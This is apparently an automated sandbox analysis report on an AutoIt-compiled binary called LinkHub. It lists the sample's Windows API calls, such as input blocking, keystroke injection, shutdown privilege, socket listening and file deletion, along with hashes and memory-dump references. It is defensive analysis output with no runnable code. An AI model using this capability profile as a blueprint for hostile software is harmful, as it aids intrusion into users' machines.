                                                                    • Opcode Fuzzy Hash: 3cb10284c20e3bfeae3ac1725d2a07aa4814204747f177b69857d9b6fa0a96ef
                                                                    • Instruction Fuzzy Hash: B231AF72900249ABDB209BA1DC49FEB37BDEF89700F1040B6F519D21A0EB709744CB64
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CEA203
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00CEA25E
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA269
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00CEA285
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEA2D5
                                                                    • SetCurrentDirectoryW.KERNEL32(00D37B94), ref: 00CEA2F3
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CEA2FD
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA30A
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA31A
                                                                      • Part of subcall function 00CDE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CDE3B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 2640511053-438819550
                                                                    • Opcode ID: 0713fd6e78d7a5fa15599b2396ad03535055a744f089bfa74a887fec05d0e2d0
                                                                    • Instruction ID: 85206e4f764310f52c0a3e260cf8ed950bbd97db04f09659efd2f0cdb674a080
                                                                    • Opcode Fuzzy Hash: 0713fd6e78d7a5fa15599b2396ad03535055a744f089bfa74a887fec05d0e2d0
                                                                    • Instruction Fuzzy Hash: E03112725006496ECF20AFB6DC49BDE77ADAF45320F104192E928E31A1DB71EF85CB25
                                                                    APIs
                                                                      • Part of subcall function 00CFD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CFC10E,?,?), ref: 00CFD415
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD451
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4C8
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFC99E
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00CFCA09
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFCA2D
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CFCA8C
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CFCB47
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CFCBB4
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CFCC49
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00CFCC9A
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CFCD43
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CFCDE2
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFCDEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 3102970594-0
                                                                    • Opcode ID: 74acd17cf4e4b49d1e4f11fd20b4e14932b195036c48057c421487d6211d99d2
                                                                    • Instruction ID: 96b6a5ccd1f2b3980c3f1ec68a40d36ff3ee9b59b3efc2079b9c76ad990e6fd7
                                                                    • Opcode Fuzzy Hash: 74acd17cf4e4b49d1e4f11fd20b4e14932b195036c48057c421487d6211d99d2
                                                                    • Instruction Fuzzy Hash: DD024C716042089FC754DF24C9D5E2ABBE5EF88304F18849DE959CB2A2CB31ED46DB52
                                                                    APIs
                                                                      • Part of subcall function 00C75851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C755D1,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C75871
                                                                      • Part of subcall function 00CDEAB0: GetFileAttributesW.KERNEL32(?,00CDD840), ref: 00CDEAB1
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDD9CD
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00CDDA88
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00CDDA9B
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00CDDAB8
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CDDAE2
                                                                      • Part of subcall function 00CDDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00CDDAC7,?,?), ref: 00CDDB5D
                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00CDDAFE
                                                                    • FindClose.KERNEL32(00000000), ref: 00CDDB0F
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 1946585618-1173974218
                                                                    • Opcode ID: bf04aac201d5e7f7a892c672c8dcf9333fbbb795dbebf987ff4a1509b83e3c80
                                                                    • Instruction ID: b4a749edf1cc6b98e0e136ffa5a91adec052a5bb5ece3abffd093ba335df2480
                                                                    • Opcode Fuzzy Hash: bf04aac201d5e7f7a892c672c8dcf9333fbbb795dbebf987ff4a1509b83e3c80
                                                                    • Instruction Fuzzy Hash: 08615F71C0110DAFCF15EBE0D952AEDBBB5AF14304F6080A6E50AB7295DB315F09EB61
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: 684c5a59f1bd7e0d617d747455a53fe81ec2f989c46e30879bdf0853c775871a
                                                                    • Instruction ID: 1c0896541dd69215f8d1a5de9fef3b69519fe0ac074fad955e66403e09742196
                                                                    • Opcode Fuzzy Hash: 684c5a59f1bd7e0d617d747455a53fe81ec2f989c46e30879bdf0853c775871a
                                                                    • Instruction Fuzzy Hash: 18419D35A04651AFD320DF26D888B157BE1FF45318F14C0ADE4698B7A2CB36ED42CBA0
                                                                    APIs
                                                                      • Part of subcall function 00CD2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD205A
                                                                      • Part of subcall function 00CD2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD2087
                                                                      • Part of subcall function 00CD2010: GetLastError.KERNEL32 ref: 00CD2097
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00CDF249
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-3163812486
                                                                    • Opcode ID: 053246f256703a7b7db99ed0fc262a49c9171f4d79e654077039286f59d0a038
                                                                    • Instruction ID: c89d90e9932025aebcf49c4fb82137ec474262651bffef7d36da0c39c16d0d0f
                                                                    • Opcode Fuzzy Hash: 053246f256703a7b7db99ed0fc262a49c9171f4d79e654077039286f59d0a038
                                                                    • Instruction Fuzzy Hash: 9C01D67A6102147BEB2462B89C8ABBE726CAB08344F15453BFF13E23D1D5605E06A1A0
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CF1CD3
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1CE0
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00CF1D17
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1D22
                                                                    • closesocket.WSOCK32(00000000), ref: 00CF1D51
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00CF1D60
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1D6A
                                                                    • closesocket.WSOCK32(00000000), ref: 00CF1D99
                                                                    Similarity
                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                    • String ID:
                                                                    • API String ID: 540024437-0
                                                                    • Opcode ID: 9212e56bc8b4c420bcd3b5434c1ed7269054f320c81e377723dd092eba7d61cd
                                                                    • Instruction ID: bf853076521c6744ec62905ceba92eea2c31f96e2407fef3a4a7c83f926c0915
                                                                    • Opcode Fuzzy Hash: 9212e56bc8b4c420bcd3b5434c1ed7269054f320c81e377723dd092eba7d61cd
                                                                    • Instruction Fuzzy Hash: C4417C31A00204EFD750DF68C484B29BBF6AB45318F18C199E95A8F396C771ED81CBE2
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00CABD54
                                                                    • _free.LIBCMT ref: 00CABD78
                                                                    • _free.LIBCMT ref: 00CABEFF
                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00D146D0), ref: 00CABF11
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00D4221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00CABF89
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00D42270,000000FF,?,0000003F,00000000,?), ref: 00CABFB6
                                                                    • _free.LIBCMT ref: 00CAC0CB
                                                                    Similarity
                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                    • String ID:
                                                                    • API String ID: 314583886-0
                                                                    • Opcode ID: c6f1e312153744659a09c4b88779a8ffcef8a69362bf2f9d4f86f0af2ef12135
                                                                    • Instruction ID: caab78623762706a1abe576e06a95acbc4819295707c92fee637dfc8a831882d
                                                                    • Opcode Fuzzy Hash: c6f1e312153744659a09c4b88779a8ffcef8a69362bf2f9d4f86f0af2ef12135
                                                                    • Instruction Fuzzy Hash: 2BC137359002469FDB249F78DC41BAABBB9EF43318F18419AF5A1DB253E7708E41DB60
                                                                    APIs
                                                                      • Part of subcall function 00C75851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C755D1,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C75871
                                                                      • Part of subcall function 00CDEAB0: GetFileAttributesW.KERNEL32(?,00CDD840), ref: 00CDEAB1
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDDCCB
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00CDDD1B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CDDD2C
                                                                    • FindClose.KERNEL32(00000000), ref: 00CDDD43
                                                                    • FindClose.KERNEL32(00000000), ref: 00CDDD4C
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 2649000838-1173974218
                                                                    • Opcode ID: 97a3c8e84ebb654553ed25e0d183f0106ef1e33d7d97a506871bcf16d226ece4
                                                                    • Instruction ID: f65acff1e3fedbaffd52a9e74d14ce1af665166f61a286ecea267712df2964c6
                                                                    • Opcode Fuzzy Hash: 97a3c8e84ebb654553ed25e0d183f0106ef1e33d7d97a506871bcf16d226ece4
                                                                    • Instruction Fuzzy Hash: A63163314083459FC700EFA0C8859AFBBE9BE95300F404D5EF5EA82291EB21DE09DB67
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00CB56C2,?,?,00000000,00000000), ref: 00CE3A1E
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00CB56C2,?,?,00000000,00000000), ref: 00CE3A35
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00CB56C2,?,?,00000000,00000000,?,?,?,?,?,?,00C766CE), ref: 00CE3A45
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00CB56C2,?,?,00000000,00000000,?,?,?,?,?,?,00C766CE), ref: 00CE3A56
                                                                    • LockResource.KERNEL32(00CB56C2,?,?,00CB56C2,?,?,00000000,00000000,?,?,?,?,?,?,00C766CE,?), ref: 00CE3A65
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: 0baa553ac465827eb9d366430600870db5e5f14adaf6b54ceaca2a864b15ce3c
                                                                    • Instruction ID: 333173faf168e196e7338ffb7d4966179bd7e068e173fd4f59f766b9c57b8c6e
                                                                    • Opcode Fuzzy Hash: 0baa553ac465827eb9d366430600870db5e5f14adaf6b54ceaca2a864b15ce3c
                                                                    • Instruction Fuzzy Hash: 1F117970200741BFE7218BA6DC4CF277BBAEBC5B40F14426DB816DB2A0DB71E9419A30
                                                                    APIs
                                                                      • Part of subcall function 00CD1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CD1916
                                                                      • Part of subcall function 00CD1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CD1922
                                                                      • Part of subcall function 00CD1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CD1931
                                                                      • Part of subcall function 00CD1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CD1938
                                                                      • Part of subcall function 00CD1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CD194E
                                                                    • GetLengthSid.ADVAPI32(?,00000000,00CD1C81), ref: 00CD20FB
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CD2107
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00CD210E
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00CD2127
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00CD1C81), ref: 00CD213B
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD2142
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    • Opcode ID: 587359336e03013cb8f7bd01a15f50bfa724064d737e804eb2e375167198953c
                                                                    • Instruction ID: ecbb21135099693bf22301d3d72d20417cc421e2fe694aa821a7d28226ca2b68
                                                                    • Opcode Fuzzy Hash: 587359336e03013cb8f7bd01a15f50bfa724064d737e804eb2e375167198953c
                                                                    • Instruction Fuzzy Hash: DF11AC71501304FFDB109BA4CC09BAE7BBAEF64355F14801AEA55D7320C735AE41CB60
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00CEA5BD
                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CEA6D0
                                                                      • Part of subcall function 00CE42B9: GetInputState.USER32 ref: 00CE4310
                                                                      • Part of subcall function 00CE42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE43AB
                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CEA5ED
                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CEA6BA
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                    • String ID: *.*
                                                                    • API String ID: 1972594611-438819550
                                                                    • Opcode ID: 7f3c492c5c8ae47411edd0b1e79af5a1af17e07ea96c74b5e27a71c5c7f9dfb7
                                                                    • Instruction ID: 4428980e62c897ce3c0495f016a89e95e33151d985bcaadd03ca83bab9d5c421
                                                                    • Opcode Fuzzy Hash: 7f3c492c5c8ae47411edd0b1e79af5a1af17e07ea96c74b5e27a71c5c7f9dfb7
                                                                    • Instruction Fuzzy Hash: 6341737190024AAFCF14DFA5C949BEEBBB9EF05310F144056F819A21A1EB30AF44DF61
                                                                    APIs
                                                                    • DefDlgProcW.USER32(?,?), ref: 00C7233E
                                                                    • GetSysColor.USER32(0000000F), ref: 00C72421
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00C72434
                                                                    Similarity
                                                                    • API ID: Color$Proc
                                                                    • String ID:
                                                                    • API String ID: 929743424-0
                                                                    APIs
                                                                      • Part of subcall function 00CF3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CF3AD7
                                                                      • Part of subcall function 00CF3AAB: _wcslen.LIBCMT ref: 00CF3AF8
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CF22BA
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF22E1
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00CF2338
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF2343
                                                                    • closesocket.WSOCK32(00000000), ref: 00CF2372
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 1601658205-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    APIs
                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00CED8CE
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00CED92F
                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00CED943
                                                                    Similarity
                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                    • String ID:
                                                                    • API String ID: 234945975-0
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,00CB46AC), ref: 00CDE482
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00CDE491
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDE4A2
                                                                    • FindClose.KERNEL32(00000000), ref: 00CDE4AE
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                    • String ID:
                                                                    • API String ID: 2695905019-0
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID: %.3d$X64
                                                                    • API String ID: 481472006-1077770165
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CA2A8A
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CA2A94
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00CA2AA1
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    APIs
                                                                      • Part of subcall function 00C9014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C909D8
                                                                      • Part of subcall function 00C9014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C909F5
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD205A
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD2087
                                                                    • GetLastError.KERNEL32 ref: 00CD2097
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                    • String ID:
                                                                    • API String ID: 577356006-0
                                                                    APIs
                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00CDED04
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID: DOWN
                                                                    • API String ID: 2434400541-711622031
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00CCE664
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID: X64
                                                                    • API String ID: 2645101109-893830106
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00CF52EE,?,?,00000035,?), ref: 00CE4229
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00CF52EE,?,?,00000035,?), ref: 00CE4239
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    APIs
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CDBC24
                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00CDBC37
                                                                    Similarity
                                                                    • API ID: InputSendkeybd_event
                                                                    • String ID:
                                                                    • API String ID: 3536248340-0
                                                                    • Opcode ID: 70650c19b7867309daf14cec8790d6cdd602ffe0e11475b2a5ebe5e78367dde0
                                                                    • Instruction ID: 91d8a99e5d94aeb93f7b12de88be0bfbf76d90d5e566a88a948adbf04f72e938
                                                                    • Opcode Fuzzy Hash: 70650c19b7867309daf14cec8790d6cdd602ffe0e11475b2a5ebe5e78367dde0
                                                                    • Instruction Fuzzy Hash: DFF01D7181424DABDB059FA5C805BBE7BB4FF04309F04840AF955E5292D7798611DFA4
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CD1B48), ref: 00CD1A20
                                                                    • CloseHandle.KERNEL32(?,?,00CD1B48), ref: 00CD1A35
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: 61b101924cda862003afa8c71ed78f0f452a0379fc322cd8d172e55b490865b0
                                                                    • Instruction ID: aacc603bf90a81aec6562b9fde30cab5ad2b40afa8e278a6c448d40f1278e823
                                                                    • Opcode Fuzzy Hash: 61b101924cda862003afa8c71ed78f0f452a0379fc322cd8d172e55b490865b0
                                                                    • Instruction Fuzzy Hash: BCE0BF72014610BFEB252B50FC09F7677A9FF04311F24891EF9A980570DB626C91EB54
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 00CEF51A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: bc961832bb93807070325d690911e7c39bd61271a448e018ce8622b116edf8d2
                                                                    • Instruction ID: 15c6eb84880019b40b9852bb83b8c4d001af0677c9c9c406902fe64d9917f233
                                                                    • Opcode Fuzzy Hash: bc961832bb93807070325d690911e7c39bd61271a448e018ce8622b116edf8d2
                                                                    • Instruction Fuzzy Hash: B6E04F322002159FC710AF6AD844A9AF7E8AFA8761F00846AF94EC7351DA70F9418BA0
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00C9075E), ref: 00C90D4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: d62e6a52e18fff53e9965617f1947c4358a5c363ac066135c09551d0b6cc4b51
                                                                    • Instruction ID: c7905ac02c528e6eb59e01ecdf142bd0b899058768422c674d28662dcc91a8cd
                                                                    • Opcode Fuzzy Hash: d62e6a52e18fff53e9965617f1947c4358a5c363ac066135c09551d0b6cc4b51
                                                                    • Instruction Fuzzy Hash:
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00CF358D
                                                                    • DeleteObject.GDI32(00000000), ref: 00CF35A0
                                                                    • DestroyWindow.USER32 ref: 00CF35AF
                                                                    • GetDesktopWindow.USER32 ref: 00CF35CA
                                                                    • GetWindowRect.USER32(00000000), ref: 00CF35D1
                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00CF3700
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00CF370E
                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF3755
                                                                    • GetClientRect.USER32(00000000,?), ref: 00CF3761
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CF379D
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF37BF
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF37D2
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF37DD
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00CF37E6
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF37F5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CF37FE
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF3805
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00CF3810
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF3822
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D10C04,00000000), ref: 00CF3838
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00CF3848
                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00CF386E
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00CF388D
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF38AF
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF3A9C
